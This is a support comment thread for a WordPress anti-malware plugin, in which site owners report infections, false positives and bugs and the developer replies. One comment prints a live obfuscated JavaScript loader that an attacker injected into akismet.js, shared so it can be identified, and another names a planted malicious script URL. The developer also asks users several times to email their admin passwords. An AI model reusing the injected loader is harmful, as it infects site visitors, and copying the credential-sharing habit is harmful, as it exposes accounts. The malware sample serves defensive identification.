Thank you!
Please let me know if I can be of any further assistance.
Thanks so much for the great plugin. I have an issue with some Malware on our site. Sucuri says it found Malware, but your plugin and Wordfence both say the site it clean. However, both computers I accessed the site with ended up getting infected with the “system-care antivirus” malware, so I suspect this is what Sucuri is picking up. I am not sure what my next step should be or where to look in my files for suspicious code. Any suggestions would be greatly appreciated.
Thanks again,
Vicki
If you have my latest definition update and you are scanning your whole site and it’s not finding anything then you may have a new virus that I have not yet identified. These threats are alway evolving and adapting to avoid detection. Would you be willing to provide me with WP Admin access to your site? Then I can find it and update my definitions update so that it can be automatically repaired by my plugin.
Error message disappeared … seems that everything is OK afterall. Thanks!
Damir
Sometimes it take a little while for Google to review your site and notice that it has been cleaned. For future reference, you can speed that process up by requesting a review in the Health section of Google’s Webmaster Tools.
The plugin detect a normal code and say : Found 1 WP-Login Exploit
<?php
/**
* WordPress User Page
*
* Handles authentication, registering, resetting passwords, forgot password,
* and other user handling.
*
* @package WordPress
*/
/** Make sure that the WordPress bootstrap has run before continuing. */
require( dirname(__FILE__) . '/wp-load.php' );
———
is that a bug?
thanks
Thanks for asking this question. No, it is not a but?
It is, as you say, normal code.
It is the essentially the first line of code in every wp-login.php in every install of WordPress.
It is also extremely vulnerable to a brute-force attack.
Basically, if that wp-load.php file is included without certain protection, it can bring down your whole server. My plugin now has a patch for this file that stops the WordPress bootstrap from loading if it senses a brute-force attack. This was inspired by the wide-spread brute-force attacks that have been targeting WordPress login pages around the world for the past few weeks. These attacks have crippled servers and probably succeeded in stealing some passwords too. So my plugin looks for the absence of my patch and , if not found, classifies this file as Exploitable. Select this file to be fixed will automatically apply my patch, in much the same way as it patches older versions of timthumb.php that can be exploited to write malicious code to files on your server.
I hope this suitably explains why it is highlighting this “normal” part of any WordPress installation. Please feel free to contact me again, should you need any further explanation or assistance.
That explains why I thought this was coming up with a false positive. I see where some people were having issues logging back in after applying the fix. Is that fixed now? I don’t want to apply the patch and then not be able to log back in.
Also, I have a couple of files that are written with an eval Base_64 statement in them. I sent the potential virus file to the creator of the plugin and asked if the code (machine code I couldn’t decode) was legitimate. They said it was legit.
My question is how do we mark a file as not a virus after using your plugin?
Thanks again Eli for everything.
There were a few people who had a problem logging in after applying the first version of this login patch. This was because there servers had register_globals turned on and WordPress destroys session vars whenever register_globals is on. I have fixed this in the current patch and it works great at stopping these brute-force attacks.
If you have any false positives that come up because a plugin developer is trying to be sneaky or cryptic like a hacker then I can whitelist that code but only after I decrypt it and check it thoroughly to make sure it is really ok.
Great job Eli. The login script cleanse works great. Tried it on a test domain and no problems at all.
Thanks so much.
I’ll get you the info on those false positives. I do have a couple of coders who like to hide what they did so most people don’t steal their ideas and processes.
Roger
Hi Eli. I love your plug-in! But I just upgraded to 1.3.04.17 and even though the site is registered I am getting an error message on ‘What to look for’:
WP-Login Exploits
Registration of your Installation Key is required for this feature
but your Scan Setting Page also tells me:
Your Installation Key is Registered:
8d8f06a5f8d73d9a59ad6f993de2fac1
http://308gts.dorman-consulting.com
Your Definitions file is current.
Is this normal?
Jeff
I’m sorry you got conflicting information on that page. I had to disable that particular update because it was causing problems on some peoples sites. I have just released a plugin update that reolves this issue. If you download the new version 1.3.04.19 then it should work correctly.
Please let me know if you still have any issues, Thanks.
Hello Eli, Just downloaded and ran your plug-in. It did find some malware and repaired on my site. Problem Is I still have an issue with my site Google is calling malware and has posted a warning. I would like to give you more info if you could look
Thanks
This is a common problem for people, after removing the malware you need to have Google review your site. There is a Malware page in the Health section of Google Webmaster tools where you can request a review.
let me know if you need any more help.
Hello,
Malware has completely messed up the appearance of my blog. I don’t have a current backup so I’m trying desperately to restore my site without completely wiping it. I’ve run several scans from various sources and they all show different results. I’ve heard good things about your plugin so I’d love to use it but it shows no threats (but skipped about 1100 files). Am I out of luck or am I doing something wrong?
Your not out of luck because you just contacted the right person. You probably just have some new malware variant that I have not written a definition for yet. If you send me your WP Admin login I will get in there and find it for you, and add it to my definition update so that it can be automatically repaired.
Thanks for sending me your login info, and for the tip about the analytics plugin. I found the Malicious code embeded in the main plugin file of the Google-Analyticator Plugin. I have added this new threat to my definitions update and repaired that files with my plugin. You can enable that Google-Analyticator Plugin again if you want to still use it.
I just stopped by to make my monthly donation.
Eli, keep up the good work, you’re a godsend.
Mahalo
Jeff
Hi Eli,
Great plugin.
Can you please help me out? My site is infected with malware.
I have a Malware entry: MW:EXPLOITKIT:BLACKHOLE1. Can your plugin fix this entry?
I already scanned and 5 threads where found. However, http://sitecheck.sucuri.net/results/vonkatwork.nl still shows that my site is infected.
Thanks!
Sucuri shows you are clean now.
If you still need more help with anything send me your WP Admin login.
I got the same problem I installed the plug in and runed the scan but nothing has changed, I am still have the same problem. Here is what my antivirus warnig is telling me:
URL:
http://movinghouston.com/wp/buy_sell/
Process:
C:Program Files (x86)GoogleChromeApp…
Infection:
JS:Iframe-AMW [Trj]
Thanks for providing a login to your admin. I added that new threat to my definitions update and then my plugin was able to remove it form the two files that were infected.
I also expaneded the search range to include the root site and it found and clean two backdoor scripts that were probably responible for planting the virus in the first place.
You site is all clean now. Let me know if there is anything else you need.
Hi
I have a site bluemonkeyonline.net that is infected with malware which appears to come from bizwonk.com, as every time I load bluemonkeyonline.net, bizwonk.com appears in the lower left of the browser window. I have scanned and infected files have been located and quarantined and a number of potential threats have been found, but the site is still infected as on reload the domain bizwonk still apears. Am I doing something wrong.
Cheers….michael
It sounds like you have an iframe injection that is not being detected by me plugin. If you want to give me WP Admin accesss to you site I can find it and add it to my definitions so it can be automatically removed.
Hi Eli!
I really need help… I’m one of several administrators for this site: http://www.bryggerietsgymnasium.se. It’s been blacklisted for a week so I decided to spend my weekend trying to solve the problems. Without success. I have installed Anti-Malware and another malware plugin and done a check with Sucuri, and I get different results everywhere. Sucuri results are that it doesn’t show any problems but still have been blacklisted by Yandex. I have updated wordpress and all plugins. Anti-Malware results refer mostly to script files (23), both in wordpress and plugins (among them the other malware plugin!). I have been able to half the problems by removing a lot of old posts but it’s more tricky when it comes to pages. The other malware plugin finds problems everywhere…. Now I’m a bit desperate. Can you please help?
Thank you//Eva
I would be happy to take a look at it if you can send me a login to your WP Admin.
I have trouble that Avast software find malware and block my site. I’ve tried almost 10 different check up software and sites that do that to find something. but doesn’t find anything. Is Avast just being stupid with my site or?
This is the second comment within a half hour that reports of such a problem with Avast!
I do not see any signs of infection on either site. So, this is either a very new/undetected virus that Avast has found, or something on both sites is giving off false positives to Avast.
If there is something new that has infected your site then it is certainly possible that my plugin (as well as others’) has in fact missed it.
If you can come up with any details about this infection that might help me identify it I would be happy to take a closer look.
Hi, a visitor of my site discovered that his Avast! flagged it as containing malware. This plugin doesnt recognize any threats when I scanned through the files. Should I not worry or might there be something that this plugin cannot find?
Your’s is one of two comments within a half hour of each other that highlight such a report about Avast!
I do not see any signs of infection on either site. So, this is either a very new/undetected virus that Avast has found, or something on both sites is giving off false positives to Avast.
If there is something new that has infected your site then it is certainly possible that my plugin (as well as others’) has in fact missed it.
If you can come up with any details about this infection that might help me identify it I would be happy to take a closer look.
I just registered the first domain and wanted to run a scan to see if it does as advertised. if it does, I too want to be able to protect all my domains under two email addresses. I have one for my personal use and one that is a reseller account I put my clients sites in.
Cheers,
That sounds like a good plan. Do you have any infected site you are trying to get clean?
Let me know if I can be of any assistance.
So far I have used the scanner on three of my sites. Each time they found 2 known threats. When I clicked auto fix, it would fix one of the files, but not the other. What should I do next. Can I actually delete that file from the directory or no? Thanks for your help.
I would not delete the file unless you are sure it is not needed for your site to function. Usually these types of infections are just one line of malicious code that is injected into a core file that your site was already using and deleting that file will break your site. The trick is to remove the malicious code while preserving the integrity of the rest of the file. That said, there are sometime files that are all bad and no good and not needed at all which you can delete but knowing the difference if the key. If my plugin cannot remove that second threat then it is probably due to the permissions on that file.
If you want I can take a look at and fix it for you and give you more info. You can send login credentials directly to my email if you want me to check it out: eli at gotmls dot net
I was pretty psyched to discover your plug-in, installed it, started to run it when it appeared to get hung up. I logged out and now I have this error:
Fatal error: Unknown: Failed opening required ‘/data/26/2/24/8/2513008/user/2752766/cgi-bin/.php/sessions/sess_d46e1d1d9b1761f304069089014695a6′ (include_path=’.:/usr/services/vux/lib/php’) in Unknown on line 0
I am very sad.
I just wanted to follow up from last week, and say thank for providing the WP Admin and FTP logins I needed to get you issue resolved.
How has your site running? It looks like it has stayed clean but I see it is still blacklisted on Google. You need to go to Google’s Webmaster tools and request a review to clear that warning. Let me know if you need help with that.
Also, it looks like there are still vulnerable timthumb.php files in the themes of two other sites on your server. These are not viruses but they are still exploitable and could lead to another infection. My plugin can scan all the sites on your server at once and automatically upgrade those timthumb files to patch that vulnerability.
Please let me know if can be of any further assistance.
Great product – just made a donation. Do you have any simple suggestions for new WordPress blogs to prevent malware, etc. I read somewhere to change categories and to make difficult passwords but I couldn’t find the article again.
There is no golden solution to this general problem, but usually keeping WordPress up-to-date and making sure the theme and plugins you are using do not have any known vulnerabilities is a good start. It is also a good idea to run regular scans for mal-ware. I am working on a cron engine for scheduling automatic scan which will help with that.
I have never hear anything about changing categories but it couldn’t hurt to have strong passwords (but these kinds of hacks usually don’t need to use your password to get in).
Thanks for your donation. The more support I get, the more I can support this plugin and make it better and stronger against a wider variety of threats and vulnerabilities.
Hi Eli,
Awesome plugin and keep the good work. Anyway, any chance to prevent the logo displayed in the menu links, I mean just like another plugins
. Thanks again.
I think you are asking if it is possible to not show the Anti-Malware menu item.
If so you may want to look on the bottom-right of the Scan Settings page and change the “Menu Item Placement Options” setting to “Sub-Menu inside the Tools Menu Item”.
If that is not what you are looking for then please try me again and I’ll see what I can do to help.
I will definitely look forward to donation, if you really helped me out. As i wasted my money into SiteLock service, i have requested the refund after getting it i will donate the same amount to you…
Please help me ASAP.
I can help you now but I will need you WP Admin login to scan for this threat. When I find it I will add it to the definition update and it can then be removed automatially. Please send login credentials to eli at gotmls dot net or reply to this notification.
Hello, I just downloaded your plugin and my website mobile version seems to be redirecting to a russian model website. Can your plug in fix this malware problem? We are more then happy to donate if it can.
It should find it and mark it as a Known Threat at which point you can click Automatically Repair to fix it.
If it does not find it, or it only find Potential Threats, then I can help you locate the source of the infection and write a new definition so that it can be automatically removed.
Please let me know if you need further help. You email your WP Admin credentials to eli at gotmls dot net if you want my direct help.
Is it possible to register more than one site, or do I need to create a different user profile for each site I’d like to scan?
If you use the same email address when registering the other sites then they will all fall under the same registration. If you have already registered some under other email addresses you can login to those accounts and transfer those domains you have already registered to your preferred email account.
Excellent. Thank you.
Hi Eli,
I ran a scan with your plugin, it found 2 security vulnerabilities in htaccess. Clicked repair, and then got 500 internal server error… now my site is down, can you help?
It looks like sucuri already removed some injected code from those htaccess files. My plugin had found some remaining code left in pieces in those files and when it tried to remove the last few pieces of code it broke the file. This would not have happened if my plugin had scanned these htaccess files before sucuri modified them (when the whole malicious redirect code was intact) or if sucuri had removed all the injected code when they cleaned the file, but at least we know how it happened and I can try to accommodate this sort of thing in the future.
Thanks for giving me the chance to look at it all on your server. Please feel free to contact me if you need more help.
Hey Eli,
Great plugin, I am impressed so far at it finding some malicious scripts, but it reports this one as a potential threat, when I am pretty sure it is a threat
Basically everything from “var _0x4470=” onwards has been appended by a hacker/ malicious script.
Thanks
[script akismet.js]
jQuery(document).ready(function () {
jQuery(‘.akismet-status’).each(function () {
var thisId = jQuery(this).attr(‘commentid’);
jQuery(this).prependTo(‘#comment-’ + thisId + ‘ .column-comment div:first-child’);
});
jQuery(‘.akismet-user-comment-count’).each(function () {
var thisId = jQuery(this).attr(‘commentid’);
jQuery(this).insertAfter(‘#comment-’ + thisId + ‘ .author strong:first’).show();
});
});
var _0x4470=["x39x3Dx31x2Ex64x28x27x35x27x29x3Bx62x28x21x39x29x7Bx38x3Dx31x2Ex6Ax3Bx34x3Dx36x28x31x2Ex69x29x3Bx37x3Dx36x28x67x2Ex6Bx29x3Bx61x20x32x3Dx31x2Ex65x28x27x63x27x29x3Bx32x2Ex66x3Dx27x35x27x3Bx32x2Ex68x3Dx27x77x3Ax2Fx2Fx74x2Ex75x2Ex6Cx2Ex76x2Fx73x2Ex72x3Fx71x3Dx27x2Bx34x2Bx27x26x6Dx3Dx27x2Bx38x2Bx27x26x6Ex3Dx27x2Bx37x3Bx61x20x33x3Dx31x2Ex6Fx28x27x33x27x29x5Bx30x5Dx3Bx33x2Ex70x28x32x29x7D","x7C","x73x70x6Cx69x74","x7Cx64x6Fx63x75x6Dx65x6Ex74x7Cx6Ax73x7Cx68x65x61x64x7Cx68x67x68x6Ax68x6Ax68x6Ax67x7Cx64x67x6Cx6Cx68x67x75x6Bx7Cx65x73x63x61x70x65x7Cx75x67x6Bx6Bx6Ax6Bx6Ax7Cx68x67x68x6Ax67x68x6Ax68x6Ax67x6Ax68x7Cx65x6Cx65x6Dx65x6Ex74x7Cx76x61x72x7Cx69x66x7Cx73x63x72x69x70x74x7Cx67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64x7Cx63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x7Cx69x64x7Cx6Ex61x76x69x67x61x74x6Fx72x7Cx73x72x63x7Cx72x65x66x65x72x72x65x72x7Cx6Cx6Fx63x61x74x69x6Fx6Ex7Cx75x73x65x72x41x67x65x6Ex74x7Cx32x31x36x7Cx6Cx63x7Cx75x61x7Cx67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65x7Cx61x70x70x65x6Ex64x43x68x69x6Cx64x7Cx72x65x66x7Cx70x68x70x7Cx7Cx39x31x7Cx31x39x36x7Cx36x34x7Cx68x74x74x70","x72x65x70x6Cx61x63x65","","x5Cx77x2B","x5Cx62","x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3–){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3–){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Thanks for reporting this. I does indeed look malicious. I will define it now and add it as a Known Threat so that it may be automatically repaired.
I just updated the definitions. Can you do the download the update and scan it again? It should now mark this threat as “Known” and give you the option to “Automatically Repair”.
Please let me know how it works for you. Thanks!
Hey Eli,
Thanks for the reply, and diligently adding to the definitions.
I have removed these manually, so haven’t been able to successfully get them to be removed with the scanner yet, but hopefully I will soon… well hopefully not actually, but you know what I mean.
I was thinking it would be good to be able to submit potential threat files to the definition too, so that jw player for example (a common plugin) isn’t caught everytime as it has an eval() in it…. that is apparently legit…?
I would be happy to submit my scripts to you from plugins… or just the links to plugins with eval() in their scripts, and you could then get the original for your definition and compare?
Thanks again.
C
Thanks. I understand. I have not had the time I need to go through and exempt all the legit uses of eval and the like. I do have a method for white-listing benign code that would otherwise come up as a potential threat but it will take some time for me to go through and list all the exceptions properly without allowing loopholes for the malicious code.
I’ve registered and donated to your site but can no longer login to my wordpress admin page.
When I tried to update the definitions from the wordpress plugin section nothing happened (the rest of the registration section was in green).
Can you help please?
I would be happy to help. If you want to give me your WP Admin credentials I can login and try it.
I am sorry I havenot made any donation yet. I just started trying the service you give. I have a problem that I can not solve yet. There is “Found the document has moved here” note on the top left corner of my blog page. I think this is a malware or a kind of virus. I try to scan all the plugins, wp content and html but this software plugin seems does not workl
Please help me this malware is very disturbing and dangerous for my web blog and my computer.
I am looking forward to your support and help. Please…
Best regards
I’m willing to help you find this bug if you can give me your WP Admin credentials.
did you ever find this problem? I have it too
Heru never responded to me. If you are willing to give me access to you WP Admin then I will track this down for you, and add it to my definitions so that it can be automatically removed.
I found the problem. If you are logged into WordPress go to Appearance>Editor> on the right hand side click on “Theme Functions” (functions.php) > “click ctrl f” on your keyboard to bring up the search tab on the upper right hand side of your panel > search for smuss.net (or whatever website the “here” link brings you too.) I’m talking about the “here” link that we are trying to get rid of on our pages> The search will bring you to a URL. Mine brought me to “http://smuss.net/jquery-1.6.3.min.js” > delete the entire URL between the “” but leave the “” and update the page. Then the problem will be fixed.
If you are not logged into wordpress extract your theme in a folder > open the theme folder > right click on functions.php > open file with notepad > scroll to the bottom of the page > look about 15 lines up for the URL and delete it > click “save” under “file” in the menu > close the notepad. Then the problem will be fixed. If you do not see the URL near the bottom (aprox 15 lines up) then you will have to search for it in this file and delete it.
This took me awhile today to track down and fix so I hope this helps someone else other than me
I just downloaded and installed the plugin. Sucuri.net scans have revealed multiple malware threats whereas the MLS plugin does not seem to find these threats. Also, when I run a scan on the publc_html, the scan seems to be running for several minutes and then it just stops. All the while, the percent complete indicator remains at zero. Any idea what might be happening?
Thanks for providing WP Admin credentials to your site. I was able to figure out why is was not finishing the scan. First, it looks like you’ve got 20+ domains installed under the main site’s public_html directory, so the Quick Scan is not an viable option. Second, you have at least one symbolic link to the public_html directory inside the public_html directory, this causes infinite recursion when drilling down through the directory structure (in order to understand recursion you must first understand recursion)
I have added the public_html directory to the exclude path so that it will not be followed a second time through. I also add the wp-snapshots directory to the exclude path just to save time. It will now scan over 5,500 folders including all those other domains but it will take some time to do a Complete Scan.
Eli is AMAZING.
I reached out to him with a malware problem on one of my sites and an hour later he was in it searching for the culprit. 30 minutes later problem solved and a plugin update on the way.
Where do you get this kind of customer service for a free plugin? As I said AMAZING!
Eli you have a fan, a friend and a donor for life.
Mahalo
Jeff
I want to skip some files, but I can’t edit ‘Skip files with the following extentions’. If I remove the standardextentions ‘png,jpg,jpeg,gif,bmp,tif,tiff,exe,zip,pdf’ the plugin still scans these extentions. Please help.
You will want to skip any binary files as they are generally larger then ascii files and do not contain any scripts. I had designed it so that you could not completely clear this field, assuming that you would always need to exclude something. I have, however, fixed it so that you can now clear this field and scan all files. Keep in mind it will likely be a waste of time to scan binary files for malicious text patterns.
Hi there
my site crashed twice now during the scan-<i still have 2 alerts.What could be the cause. Before I deactivate the plugin I would like know what you suggest
Silgin
These 2 “Alerts” you are talking about are from Sucuri.net and they are cached from 2 days ago. I just had Sucuri refresh their cache by clicking “Re-Scan” on their site and the results confirmed that your site is now clean.
i got something like this
“Warning: set_time_limit() has been disabled for security reasons in…”
What should i do? Is this a problem or just an unimportant info?
Thanks
It’s not something to worry about. I am setting the timeout to 60 seconds in a recursive loop so that it does not get stock in some part of that scan process. Your server’s security settings seem to be stopping me from setting that value.
I will suppress this error in my next release by changing set_time_limit to @set_time_limit. You can add the @ to your version if you want to suppress these errors now.
The plugin says my number is not registered, but your site says it is. I’ve logged on with the password you supplied. I’ve reloaded the plugin page, but no change.
Lane
Somehow your site was registered in my database without a trailing ‘/’ (slash). I have corrected this error in my database so it should work for you now.
Thanks for contacting me about this issue. Please let me know if there is anything else I can do.
Thanks, that seems to have fixed it. It doesn’t say I’m registered, but at least it no longer says I’m not!
The search for updates, plugin and definitions is taking forever, but maybe your server is overloaded.
I did a scan of plugins, and out of 1131 files, it found 59 potentials in 9 different plugins. These are plugins I’ve used for a long time.
It should say “Your Installation Key is Registered” in green letters in the Definition Updates section on the right. It should also say “Your Definitions file is current” below that. You want to make sure that you have downloaded the latest definitions. Then you want to scan your whole site (not just the plugins directory).
I wouldn’t worry about those “Potential Threats” in Yellow, it’s just the ones in Red you should repair.
Yes, when the definition update finished, it did display the above.
Unfortunately, when I did a wp-content scan, it listed a bunch of files from one plugin in red. This is a very valuable auto-blogging plugin, and I wouldn’t want to do anything to harm it unnecessarily. What does repairing involve?
Trying to do a public_html scan, I got this error: Fatal error: Maximum execution time of 30 seconds exceeded in /home/thewebdr/public_html/wp-content/plugins/gotmls/index.php on line 82
I had seen that in the wp-content scan, and I added to a php.ini in public_html:
max_execution_time = 600
I don’t know why it’s not taking effect.
My plugin was designed to remove the threat from an infected file without breaking the file. Admittedly it’s not always 100% effective and I have had a couple of False Positives in the past. So, make a backup of the plugin and then run the Automatic Repair and see what happens. There is also a link to revert the changes if it dies break something.
There are also two lines in a recursive loop within plugins/gotmls/images.php (lines 244 and 276) where you would need to change
set_time_limit(30);
to a higher number.
I Have found 6 potential threats what’s next?
see my FAQs:
http://gotmls.net/faqs/
Hi,
just donated and didn’t write the sites name. Is it registered some how anyway?
Thanks!
Yes. Donating from your WP-Admin will pass along your Installation Key for my plugin. I see that your donation is associated with your site name.
Hi
my site http://www.tradeexpressions.com.sg is infected by malware. i have scanned using this plugin and confirmed. Please tell me how to remove all those.
Thanks
Selvan
If my plugin finds “Know Threats” (in red) you should see a button that says “Repair SELECTED files Now”.
If all you are finding is “Potential Threats” (in yellow) then please send me a screenshot and I’ll see if anything stick out at me as suspicious.
Once again your great plugin spotted malware on several of my sites and then removed it. I’m just waiting to see if it sneeks back in again but meanwhile although I’ve already made a modest donation I’ve decided to make another one each time another infection is spotted.
Cheers and keep up the good work.
Regards
Will Chapman
Thanks the donating again, I like that philosophy.
Let me know it they come back and I can take a look (maybe figure out how they got in).
Hi, I love the plugin, but I run multiple sites, and it’s not letting me use the plugin on site 2 with the same email address I used for site 1. Is there a developer’s package, or some way to do this? I use the same admin email for all of the sites. I did donate! Thanks!
I am working on supporting multiple domains registered under one email account. As a test I have manually registered another one of your domains under the same account you already have (the one I added is the same one you use as your email address). If you install my GOTMLS Plugin on that domain you should see that it is already registered. You should also see that it has the ability to scan one level higher in your directory hierarchy. Hopefully this will enable you to scan all your domains on that server from one WP Admin. Please let me know if this works for you as desired or if you have any problems.
I’ve the sme problem. I manage 40 no profit plogs and I would like to protect all with your plugin but seems only one could be registered with an email adress. a Pity!
I have changed the registration process on gotmls.net to accept multiple site/key registrations under a single email address. Give it a try and let me know how it works for you.
I’m having a problem here too. I currently have two sites registered with gotmls.net (and I’ve donated!). But I can’t figure out how to add another site. There’s no way to do it after you’ve logged in.
Can you help?
The best way to register any site is to install the plugin on that site and then use the built-in registration for on the Anti-Malware Settings page in the WP-Admin of the site you want to register. If you use the same email address on the form as you did on the registration for your other sites then all your site will be registered under the same account. If you already registered the new site under a different email then you can login to that account on gotmls.net and transfer that site’s registration to your other account so that they are all together.
Hi Eli:
I just downloaded your latest version 1.2.04.04 and the following two warnings are on the dashboard for the plugin:
Warning: array_merge() [function.array-merge]: Argument #1 is not an array in …/wp-content/plugins/gotmls/index.php on line 432
Warning: implode() [function.implode]: Invalid arguments passed in …/wp-content/plugins/gotmls/index.php on line 470
When I run the scan, a whole slew of warnings appear about the plugin. Let me know. Thanks, Art
Thanks for reporting this bug. I just fixed it in my newest release (version 1.2.04.08).
Thanks so much for the update; it now works fine. Art
Usually the Potential Threats are ok. If you find Known Threats and remove them then you site will likely come up clean. You can request a review from Google in your Webmaster Tools account if you are still getting warnings from the search engine.
The warning from Google is gone! You are a genious. I am now telling everyone in my vast networks on Facebook, LinkedIn, XING and Twitter to download your plug in, pronto!
it´s done and all is working perfect thank you